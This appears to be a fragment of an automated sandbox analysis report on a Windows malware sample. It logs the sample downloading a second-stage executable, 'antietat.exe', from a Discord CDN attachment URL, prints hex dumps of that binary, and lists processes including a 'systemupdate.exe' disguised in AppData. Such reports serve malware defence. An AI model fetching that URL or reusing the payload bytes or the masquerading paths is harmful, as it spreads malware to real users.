                          2024-12-05 10:41:07 UTC1369INData Raw: ef 5f b1 81 d4 7f 67 d7 31 eb 9d 02 56 28 f4 a6 c4 af fd 95 1f e1 10 f7 55 ab 63 cc c2 e6 61 80 10 f9 fc 3b 17 1a a8 f1 73 c4 cc dc 76 6e 8c 74 45 08 3b a3 bc 14 cb 84 9c 24 a1 58 53 2e 48 03 50 e1 a3 95 73 ac 57 0f 9e fa 54 56 56 60 46 43 b2 de 26 51 91 d6 95 73 75 f9 af e8 01 b2 ae cc bd 99 09 1b a3 a0 fa 58 cb 01 8e c1 b1 8f 02 52 88 36 cb 20 7b d6 92 32 ad 0d ee 2a 95 89 9e 11 92 bf f9 de 87 a0 e6 5e e7 0b 3f f3 ba 49 2b 57 36 08 38 be 09 2c 2b e2 5f aa 34 f4 09 8f ac 36 e6 8b 28 42 77 f3 1c 28 6b 98 5f a5 96 72 9d 16 42 b5 5f 0c d7 de 84 29 17 2d 91 ad ba 1e 7c d8 dc 4f 79 df 1a 0d ab bd 57 3b f2 51 63 26 a3 d6 fb 91 ef ed f1 b6 f9 13 39 8f cd c8 74 01 ec af 57 2c 51 42 a6 dc 22 61 81 7c bf d1 81 91 15 bd 2b f9 b8 bd a1 19 dc 50 9a 61 57 2e 98 bd 20
                          Data Ascii: _g1V(Uca;svntE;$XS.HPsWTVV`FC&QsuXR6 {2*^?I+W68,+_46(Bw(k_rB_)-|OyW;Qc&9tW,QB"a|+PaW.
                          2024-12-05 10:41:07 UTC1369INData Raw: 3c 4a 5a 6d 1c b6 e8 28 32 b5 e2 29 dd 10 ea ab 10 38 7b 6b c8 ac 46 56 e6 32 b1 a5 4f 24 07 0c af dc a4 64 c1 11 48 80 7f 19 d4 ba a3 83 4b f7 07 9c a0 80 8c 4c b2 b7 05 c1 3e 2f 43 8b d2 02 5e 35 ff fb 1d 4c c5 c8 f4 a4 c4 35 f3 ca ea 16 be 92 f3 53 51 76 79 45 ed fb 82 22 f2 ea 1b 1e 87 5a 20 5e dd ef b6 7e 7e 46 35 95 f7 9b aa 99 b9 56 d9 2a 5f 82 cf 5e 3a 1e dc c6 75 4c ee c1 ed bd df bf 75 64 64 e0 95 99 0b 94 b9 3d 37 d2 6e d9 37 97 40 4d e0 99 96 8c 3d 36 ec 9c 87 b8 ed 8d 09 ba 5c 41 26 f4 47 78 55 2e cb 98 e1 34 69 9a e6 ee d9 16 9a 60 e9 07 52 82 27 a7 0d b2 b1 6d d6 2d aa a8 a4 44 e4 76 d6 5b de 19 fa b5 69 7f be 11 87 aa 9f 57 19 b9 9a c9 82 1c 85 a7 35 22 90 d9 85 a1 ff 89 8f dd 2d 20 db 57 e9 b8 6e 99 67 a7 c4 78 3c b4 13 ef a8 da 72 27 83
                          Data Ascii: <JZm(2)8{kFV2O$dHKL>/C^5L5SQvyE"Z ^~~F5V*_^:uLudd=7n7@M=6\A&GxU.4i`R'm-Dv[iW5"- Wngx<r'
                          2024-12-05 10:41:07 UTC1369INData Raw: 49 0b db 19 46 d5 0f 7b d3 8a 54 52 89 f1 10 fd e4 4c 9d 83 7e 05 ea 92 61 23 68 77 0b 1d 42 3e f3 2e 71 98 b3 22 b2 d5 7e 80 67 12 23 9f e9 f1 a9 54 ed ca af b2 80 80 33 02 61 ca f2 4e 4d 4e b1 ac 5f d3 3d 55 5b 19 9a be 7d e3 b8 46 07 9d dc 48 59 7f 76 f1 d4 ed 8c 86 02 d8 1d e0 c5 40 14 9f 4e 6e b5 55 ba 21 73 37 60 cc 5f 9a b5 8c 6c dd 26 31 90 b0 41 ca a0 e9 d8 64 44 59 0e e1 61 da 1d 19 ee 75 8b 0d 5c 30 83 35 d8 e7 7d 2e 85 86 8a b6 68 14 e2 97 78 56 ec c6 25 32 9a 94 0d 34 da 90 bf 1b dc ff d7 27 fa b9 99 14 7b 12 91 c0 c9 b6 31 b8 ca fc c4 5f 17 16 e9 c4 91 09 6b 92 ca 4a 9f b3 de 13 f7 97 ae 48 39 1b a6 b8 3e 6f ae db d3 95 50 3a a6 a9 d6 f9 79 bb 7e 6e 45 53 41 5a 7b 0d b0 62 ce a1 10 39 1c 56 3e 33 7c b9 aa e1 b2 ee 45 8f 5b ac 66 01 4f e8 0a
                          Data Ascii: IF{TRL~a#hwB>.q"~g#T3aNMN_=U[}FHYv@NnU!s7`_l&1AdDYau\05}.hxV%24'{1_kJH9>oP:y~nESAZ{b9V>3|E[fO


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.749709162.159.134.2334433808C:\Users\user\Desktop\sNifdpWiY9.exe
                          TimestampBytes transferredDirectionData
                          2024-12-05 10:41:17 UTC417OUTGET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1
                          User-Agent: Downloader
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
                          2024-12-05 10:41:18 UTC1265INHTTP/1.1 200 OK
                          Date: Thu, 05 Dec 2024 10:41:18 GMT
                          Content-Type: application/x-msdos-program
                          Content-Length: 46592
                          Connection: close
                          CF-Ray: 8ed36c47b8cb42e7-EWR
                          CF-Cache-Status: HIT
                          Accept-Ranges: bytes, bytes
                          Age: 13438
                          Cache-Control: public, max-age=31536000
                          Content-Disposition: attachment; filename="antietat.exe"
                          ETag: "2eddba95f5818ef402bfe7fbaa0f6a18"
                          Expires: Fri, 05 Dec 2025 10:41:18 GMT
                          Last-Modified: Thu, 05 Dec 2024 05:13:43 GMT
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          x-goog-generation: 1733375623321737
                          x-goog-hash: crc32c=C+Z3jw==
                          x-goog-hash: md5=Lt26lfWBjvQCv+f7qg9qGA==
                          x-goog-metageneration: 1
                          x-goog-storage-class: STANDARD
                          x-goog-stored-content-encoding: identity
                          x-goog-stored-content-length: 46592
                          x-guploader-uploadid: AFiumC5KewGqCdjqrDiVmKhof3L_YhJd69mxK8gUrus2hdwbkNR2Kd9X2RkSjYVGnr87jIWq51Q
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSnTPGcvCWWWy5ga75CpCLNnVQg9oTJGeFhIiD7O1vkUpfmoz%2BfDG4KbO1dxdXc2l4%2BLBC5d%2BRu85KOfJag7zkiN7FoWi5ptitqoVm%2FheFc700nsbboUBbOWDanHhz3H3H6e7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          2024-12-05 10:41:18 UTC184INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 69 73 61 34 78 31 49 45 37 78 64 6a 54 55 4d 5a 72 67 30 39 47 30 7a 2e 35 39 58 49 4c 53 48 68 41 46 72 4b 36 4e 77 79 32 58 63 2d 31 37 33 33 33 39 35 32 37 38 30 37 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                          Data Ascii: Set-Cookie: _cfuvid=isa4x1IE7xdjTUMZrg09G0z.59XILSHhAFrK6Nwy2Xc-1733395278077-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
                          2024-12-05 10:41:18 UTC1289INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 04 fb 50 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 7a 00 00 00 b2 00 00 00 0c 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 01 00 00 04 00 00 e1 cf 00 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdPg.+z@@`
                          2024-12-05 10:41:18 UTC1369INData Raw: 28 c3 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85 c0 0f 95 c1 e9 2c ff ff ff 66 90 48 83 ec 38 48 8b 05 b5 9a 00 00 4c 8d 05 d6 ce 00 00 48 8d 15 d7 ce 00 00 48 8d 0d d8 ce 00 00 8b 00 89 05 ac ce 00 00 48 8b 05 51 9a 00 00 44 8b 08 48 8d 05 9b ce 00 00 48 89 44 24 20 e8 75 73 00 00 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 b8 30 00 00 00 65 67 48 8b 00 48 8b 70 08 48 8b 1d 91 99 00 00 48 8b 3d 3a e1 00 00 eb 18 0f 1f 84 00 00 00 00 00 48 39 c6 0f 84 5f 01 00 00 b9 e8 03 00 00 ff d7 31 c0 f0 48 0f b1 33 75 e7 31 ff 48 8b 35 6e 99 00 00 8b 06 83 f8 01 0f 84 ca 01 00 00 8b 06 85 c0 0f 84 69 01 00 00 c7 05 17 ce 00 00 01 00 00 00 8b 06 83 f8 01 0f 84 78 01 00 00 85 ff 0f 84 3c 01 00 00 48 8b 05 95
                          Data Ascii: (Dxt@D1E,fH8HLHHHQDHHD$ usH8ATUWVSH 0egHHpHH=:H9_1H3u1H5nix<H
                          2024-12-05 10:41:18 UTC1369INData Raw: 00 00 48 63 7e 3c 48 01 f7 81 3f 50 45 00 00 0f 85 bb 00 00 00 8b 57 50 41 b9 40 00 00 00 41 b8 00 30 00 00 31 c9 ff 15 62 dc 00 00 48 89 c5 48 85 c0 0f 84 b9 00 00 00 44 8b 47 54 48 89 f2 48 89 c1 45 31 e4 e8 04 6f 00 00 48 63 46 3c 66 83 7f 06 00 48 8d 9c 06 14 01 00 00 74 26 90 8b 0b 8b 53 08 41 83 c4 01 48 83 c3 28 44 8b 43 dc 48 01 e9 48 01 f2 e8 d4 6e 00 00 0f b7 47 06 44 39 e0 7f db 48 8d 0d ec 8a 00 00 e8 8f 11 00 00 8b 5f 28 48 8d 0d 0d 8b 00 00 48 01 eb 48 89 da e8 7a 11 00 00 48 8d 0d 2b 8b 00 00 e8 6e 11 00 00 ff d3 41 b8 00 80 00 00 31 d2 48 89 e9 ff 15 d3 db 00 00 31 c0 48 83 c4 20 5b 5e 5f 5d 41 5c c3 48 8d 0d 3f 8a 00 00 e8 42 11 00 00 b8 ff ff ff ff eb e2 48 8d 0d 04 8a 00 00 e8 2f 11 00 00 eb eb ff 15 57 db 00 00 48 8d 0d 38 8a 00 00 89
                          Data Ascii: Hc~<H?PEWPA@A01bHHDGTHHE1oHcF<fHt&SAH(DCHHnGD9H_(HHHzH+nA1H1H [^_]A\H?BH/WH8
                          2024-12-05 10:41:18 UTC1369INData Raw: d6 00 00 48 8d 0d d3 89 00 00 89 c2 e8 64 fe ff ff 0f 1f 40 00 31 f6 e9 21 ff ff ff 48 8b 05 ca c4 00 00 8b 57 08 48 8d 0d 78 89 00 00 4c 8b 44 18 18 e8 3e fe ff ff 48 89 da 48 8d 0d 44 89 00 00 e8 2f fe ff ff 90 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 55 41 57 41 56 41 55 41 54 57 56 53 48 83 ec 48 48 8d 6c 24 40 44 8b 25 74 c4 00 00 45 85 e4 74 17 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 66 0f 1f 44 00 00 c7 05 4e c4 00 00 01 00 00 00 e8 89 09 00 00 48 98 48 8d 04 80 48 8d 04 c5 0f 00 00 00 48 83 e0 f0 e8 d2 0b 00 00 4c 8b 2d 0b 8e 00 00 48 8b 1d 14 8e 00 00 48 29 c4 c7 05 1b c4 00 00 00 00 00 00 48 8d 44 24 30 48 89 05 13 c4 00 00 4c 89 e8 48 29 d8 48 83 f8 07 7e 90 48 83 f8 0b 0f 8f 5d 01 00 00 8b 03 85 c0 0f 85 5b 02 00 00 8b 43 04 85 c0
                          Data Ascii: Hd@1!HWHxLD>HHD/ff.UAWAVAUATWVSHHHl$@D%tEtHe[^_A\A]A^A_]fDNHHHHL-HH)HD$0HLH)H~H][C
                          2024-12-05 10:41:18 UTC1369INData Raw: 00 00 00 e8 a4 64 00 00 48 83 f8 01 74 2a 48 85 c0 0f 84 14 ff ff ff b9 0b 00 00 00 ff d0 e9 3d ff ff ff 66 0f 1f 84 00 00 00 00 00 b9 08 00 00 00 ff d0 e9 28 ff ff ff ba 01 00 00 00 b9 0b 00 00 00 e8 65 64 00 00 e9 14 ff ff ff ba 01 00 00 00 b9 04 00 00 00 e8 51 64 00 00 e9 00 ff ff ff ba 01 00 00 00 b9 08 00 00 00 e8 3d 64 00 00 e8 98 f8 ff ff e9 e7 fe ff ff 90 90 90 66 2e 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 41 54 55 57 56 53 48 83 ec 20 4c 8d 25 4f bf 00 00 4c 89 e1 ff 15 ee d0 00 00 48 8b 1d 1f bf 00 00 48 85 db 74 3e 48 8b 2d 1b d1 00 00 48 8b 3d dc d0 00 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 8b 0b ff d5 48 89 c6 ff d7 48 85 f6 74 0d 85 c0 75 09 48 8b 43 08 48 89 f1 ff d0 48 8b 5b 10 48 85 db 75 dc 4c 89 e1 48 83 c4 20 5b 5e 5f 5d 41 5c 48 ff
                          Data Ascii: dHt*H=f(edQd=df.fDATUWVSH L%OLHHt>H-H=ff.HHtuHCHH[HuLH [^_]A\H
                          2024-12-05 10:41:18 UTC1369INData Raw: 8d 54 d0 28 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f6 40 27 20 74 09 48 85 c9 74 b5 48 83 e9 01 48 83 c0 28 48 39 c2 75 e8 31 c0 c3 0f 1f 44 00 00 48 8b 05 c9 83 00 00 31 d2 66 81 38 4d 5a 75 0f 48 63 48 3c 48 01 c1 81 39 50 45 00 00 74 09 48 89 d0 c3 0f 1f 44 00 00 66 81 79 18 0b 02 48 0f 44 d0 48 89 d0 c3 66 2e 0f 1f 84 00 00 00 00 00 48 8b 15 89 83 00 00 31 c0 66 81 3a 4d 5a 75 10 4c 63 42 3c 49 01 d0 41 81 38 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 41 81 78 18 0b 02 75 ef 48 29 d1 45 0f b7 48 06 41 0f b7 50 14 49 8d 54 10 18 66 45 85 c9 74 d7 41 8d 41 ff 48 8d 04 80 4c 8d 4c c2 28 66 2e 0f 1f 84 00 00 00 00 00 44 8b 42 0c 4c 89 c0 4c 39 c1 72 08 03 42 08 48 39 c1 72 0c 48 83 c2 28 49 39 d1 75 e3 31 c0 c3 8b 42 24 f7 d0 c1 e8 1f c3 0f 1f 80
                          Data Ascii: T(ff.@@' tHtHH(H9u1DH1f8MZuHcH<H9PEtHDfyHDHf.H1f:MZuLcB<IA8PEtfAxuH)EHAPITfEtAAHLL(f.DBLL9rBH9rH(I9u1B$


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.749735162.159.134.2334431860C:\Users\user\Desktop\sNifdpWiY9.exe
                          TimestampBytes transferredDirectionData
                          2024-12-05 10:41:26 UTC417OUTGET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1
                          User-Agent: Downloader
                          Host: cdn.discordapp.com
                          Cache-Control: no-cache
                          Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
                          2024-12-05 10:41:26 UTC1263INHTTP/1.1 200 OK
                          Date: Thu, 05 Dec 2024 10:41:26 GMT
                          Content-Type: application/x-msdos-program
                          Content-Length: 46592
                          Connection: close
                          CF-Ray: 8ed36c7b0a524382-EWR
                          CF-Cache-Status: HIT
                          Accept-Ranges: bytes, bytes
                          Age: 13446
                          Cache-Control: public, max-age=31536000
                          Content-Disposition: attachment; filename="antietat.exe"
                          ETag: "2eddba95f5818ef402bfe7fbaa0f6a18"
                          Expires: Fri, 05 Dec 2025 10:41:26 GMT
                          Last-Modified: Thu, 05 Dec 2024 05:13:43 GMT
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          x-goog-generation: 1733375623321737
                          x-goog-hash: crc32c=C+Z3jw==
                          x-goog-hash: md5=Lt26lfWBjvQCv+f7qg9qGA==
                          x-goog-metageneration: 1
                          x-goog-storage-class: STANDARD
                          x-goog-stored-content-encoding: identity
                          x-goog-stored-content-length: 46592
                          x-guploader-uploadid: AFiumC5KewGqCdjqrDiVmKhof3L_YhJd69mxK8gUrus2hdwbkNR2Kd9X2RkSjYVGnr87jIWq51Q
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jH5PF3wBoLW5yEu4HF3yUEb2K2TkMGrBQTZv6%2BPMMAevunuqDZiCyNvpjnCtfeUs13LeAEyq%2B4U1XlAvecowVYVegP82el5TIHe1MrpVYgHzRwu9kLM3R5e1nRyI%2FUkTkGhxHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          2024-12-05 10:41:26 UTC184INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 44 5a 79 57 6a 76 6e 45 36 6f 79 51 6d 79 4f 69 46 6c 72 4c 71 49 54 2e 76 64 58 6b 53 6b 53 70 4e 62 58 47 69 61 4b 30 69 67 4d 2d 31 37 33 33 33 39 35 32 38 36 33 30 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                          Data Ascii: Set-Cookie: _cfuvid=DZyWjvnE6oyQmyOiFlrLqIT.vdXkSkSpNbXGiaK0igM-1733395286301-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
                          2024-12-05 10:41:26 UTC1291INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 04 fb 50 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 7a 00 00 00 b2 00 00 00 0c 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 01 00 00 04 00 00 e1 cf 00 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdPg.+z@@`
                          2024-12-05 10:41:26 UTC1369INData Raw: 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85 c0 0f 95 c1 e9 2c ff ff ff 66 90 48 83 ec 38 48 8b 05 b5 9a 00 00 4c 8d 05 d6 ce 00 00 48 8d 15 d7 ce 00 00 48 8d 0d d8 ce 00 00 8b 00 89 05 ac ce 00 00 48 8b 05 51 9a 00 00 44 8b 08 48 8d 05 9b ce 00 00 48 89 44 24 20 e8 75 73 00 00 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 b8 30 00 00 00 65 67 48 8b 00 48 8b 70 08 48 8b 1d 91 99 00 00 48 8b 3d 3a e1 00 00 eb 18 0f 1f 84 00 00 00 00 00 48 39 c6 0f 84 5f 01 00 00 b9 e8 03 00 00 ff d7 31 c0 f0 48 0f b1 33 75 e7 31 ff 48 8b 35 6e 99 00 00 8b 06 83 f8 01 0f 84 ca 01 00 00 8b 06 85 c0 0f 84 69 01 00 00 c7 05 17 ce 00 00 01 00 00 00 8b 06 83 f8 01 0f 84 78 01 00 00 85 ff 0f 84 3c 01 00 00 48 8b 05 95 98 00
                          Data Ascii: Dxt@D1E,fH8HLHHHQDHHD$ usH8ATUWVSH 0egHHpHH=:H9_1H3u1H5nix<H
                          2024-12-05 10:41:26 UTC1369INData Raw: 48 63 7e 3c 48 01 f7 81 3f 50 45 00 00 0f 85 bb 00 00 00 8b 57 50 41 b9 40 00 00 00 41 b8 00 30 00 00 31 c9 ff 15 62 dc 00 00 48 89 c5 48 85 c0 0f 84 b9 00 00 00 44 8b 47 54 48 89 f2 48 89 c1 45 31 e4 e8 04 6f 00 00 48 63 46 3c 66 83 7f 06 00 48 8d 9c 06 14 01 00 00 74 26 90 8b 0b 8b 53 08 41 83 c4 01 48 83 c3 28 44 8b 43 dc 48 01 e9 48 01 f2 e8 d4 6e 00 00 0f b7 47 06 44 39 e0 7f db 48 8d 0d ec 8a 00 00 e8 8f 11 00 00 8b 5f 28 48 8d 0d 0d 8b 00 00 48 01 eb 48 89 da e8 7a 11 00 00 48 8d 0d 2b 8b 00 00 e8 6e 11 00 00 ff d3 41 b8 00 80 00 00 31 d2 48 89 e9 ff 15 d3 db 00 00 31 c0 48 83 c4 20 5b 5e 5f 5d 41 5c c3 48 8d 0d 3f 8a 00 00 e8 42 11 00 00 b8 ff ff ff ff eb e2 48 8d 0d 04 8a 00 00 e8 2f 11 00 00 eb eb ff 15 57 db 00 00 48 8d 0d 38 8a 00 00 89 c2 e8
                          Data Ascii: Hc~<H?PEWPA@A01bHHDGTHHE1oHcF<fHt&SAH(DCHHnGD9H_(HHHzH+nA1H1H [^_]A\H?BH/WH8
                          2024-12-05 10:41:26 UTC1369INData Raw: 00 48 8d 0d d3 89 00 00 89 c2 e8 64 fe ff ff 0f 1f 40 00 31 f6 e9 21 ff ff ff 48 8b 05 ca c4 00 00 8b 57 08 48 8d 0d 78 89 00 00 4c 8b 44 18 18 e8 3e fe ff ff 48 89 da 48 8d 0d 44 89 00 00 e8 2f fe ff ff 90 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 55 41 57 41 56 41 55 41 54 57 56 53 48 83 ec 48 48 8d 6c 24 40 44 8b 25 74 c4 00 00 45 85 e4 74 17 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 66 0f 1f 44 00 00 c7 05 4e c4 00 00 01 00 00 00 e8 89 09 00 00 48 98 48 8d 04 80 48 8d 04 c5 0f 00 00 00 48 83 e0 f0 e8 d2 0b 00 00 4c 8b 2d 0b 8e 00 00 48 8b 1d 14 8e 00 00 48 29 c4 c7 05 1b c4 00 00 00 00 00 00 48 8d 44 24 30 48 89 05 13 c4 00 00 4c 89 e8 48 29 d8 48 83 f8 07 7e 90 48 83 f8 0b 0f 8f 5d 01 00 00 8b 03 85 c0 0f 85 5b 02 00 00 8b 43 04 85 c0 0f 85
                          Data Ascii: Hd@1!HWHxLD>HHD/ff.UAWAVAUATWVSHHHl$@D%tEtHe[^_A\A]A^A_]fDNHHHHL-HH)HD$0HLH)H~H][C
                          2024-12-05 10:41:26 UTC1369INData Raw: 00 e8 a4 64 00 00 48 83 f8 01 74 2a 48 85 c0 0f 84 14 ff ff ff b9 0b 00 00 00 ff d0 e9 3d ff ff ff 66 0f 1f 84 00 00 00 00 00 b9 08 00 00 00 ff d0 e9 28 ff ff ff ba 01 00 00 00 b9 0b 00 00 00 e8 65 64 00 00 e9 14 ff ff ff ba 01 00 00 00 b9 04 00 00 00 e8 51 64 00 00 e9 00 ff ff ff ba 01 00 00 00 b9 08 00 00 00 e8 3d 64 00 00 e8 98 f8 ff ff e9 e7 fe ff ff 90 90 90 66 2e 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 41 54 55 57 56 53 48 83 ec 20 4c 8d 25 4f bf 00 00 4c 89 e1 ff 15 ee d0 00 00 48 8b 1d 1f bf 00 00 48 85 db 74 3e 48 8b 2d 1b d1 00 00 48 8b 3d dc d0 00 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 8b 0b ff d5 48 89 c6 ff d7 48 85 f6 74 0d 85 c0 75 09 48 8b 43 08 48 89 f1 ff d0 48 8b 5b 10 48 85 db 75 dc 4c 89 e1 48 83 c4 20 5b 5e 5f 5d 41 5c 48 ff 25 b0
                          Data Ascii: dHt*H=f(edQd=df.fDATUWVSH L%OLHHt>H-H=ff.HHtuHCHH[HuLH [^_]A\H%
                          2024-12-05 10:41:26 UTC1369INData Raw: d0 28 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f6 40 27 20 74 09 48 85 c9 74 b5 48 83 e9 01 48 83 c0 28 48 39 c2 75 e8 31 c0 c3 0f 1f 44 00 00 48 8b 05 c9 83 00 00 31 d2 66 81 38 4d 5a 75 0f 48 63 48 3c 48 01 c1 81 39 50 45 00 00 74 09 48 89 d0 c3 0f 1f 44 00 00 66 81 79 18 0b 02 48 0f 44 d0 48 89 d0 c3 66 2e 0f 1f 84 00 00 00 00 00 48 8b 15 89 83 00 00 31 c0 66 81 3a 4d 5a 75 10 4c 63 42 3c 49 01 d0 41 81 38 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 41 81 78 18 0b 02 75 ef 48 29 d1 45 0f b7 48 06 41 0f b7 50 14 49 8d 54 10 18 66 45 85 c9 74 d7 41 8d 41 ff 48 8d 04 80 4c 8d 4c c2 28 66 2e 0f 1f 84 00 00 00 00 00 44 8b 42 0c 4c 89 c0 4c 39 c1 72 08 03 42 08 48 39 c1 72 0c 48 83 c2 28 49 39 d1 75 e3 31 c0 c3 8b 42 24 f7 d0 c1 e8 1f c3 0f 1f 80 00 00
                          Data Ascii: (ff.@@' tHtHH(H9u1DH1f8MZuHcH<H9PEtHDfyHDHf.H1f:MZuLcB<IA8PEtfAxuH)EHAPITfEtAAHLL(f.DBLL9rBH9rH(I9u1B$


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:05:41:01
                          Start date:05/12/2024
                          Path:C:\Users\user\Desktop\sNifdpWiY9.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\sNifdpWiY9.exe"
                          Imagebase:0x7ff75f8b0000
                          File size:3'188'321 bytes
                          MD5 hash:897699BDF92B6380FA7ABD4FDA6794CA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:05:41:01
                          Start date:05/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:05:41:07
                          Start date:05/12/2024
                          Path:C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin
                          Imagebase:0x7ff6ec320000
                          File size:46'592 bytes
                          MD5 hash:2EDDBA95F5818EF402BFE7FBAA0F6A18
                          Has elevated privileges:true
